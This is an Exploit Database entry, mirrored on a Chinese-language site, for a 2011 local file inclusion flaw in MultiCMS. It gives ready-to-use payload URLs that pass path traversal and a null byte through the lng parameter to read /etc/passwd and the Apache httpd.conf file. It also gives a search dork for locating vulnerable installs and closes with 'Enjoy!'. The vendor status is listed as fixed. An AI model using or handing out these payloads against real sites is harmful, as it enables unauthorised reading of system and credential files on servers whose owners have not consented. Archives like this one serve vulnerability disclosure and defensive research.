MultiCMS – Local File Inclusion

• Exploit Database
• 10 阅读

• 作者： R3VAN_BASTARD
  日期： 2011-01-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16074/

• Source: http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
  
  =============================www[dot]Whiteponny[dot]com=============================
  # Date: 29/01/2011
  # Author: R3VAN_BASTARD
  # Exploit Title: MultiCMS File Inclusion Vulnerbility
  # Vendor: http://www.multicms.net
  # Status: FIXED
  # Tested on: Windows 7
  # Dork: "Redakcní systém MultiCMS"
  # Mail: defrontliner@whiteponny.com
  ================================================================================
  # File: /Index.php?lng=[LFI]
  # XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
   http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 
  
  Enjoy! :D
  ================================================================================
  Thanks To: Madonk "Makasih udah nemenin Scan :D"
   S3T4N a.k.a Zeth.
   All My Friends
  =============================www[dot]Whiteponny[dot]com=============================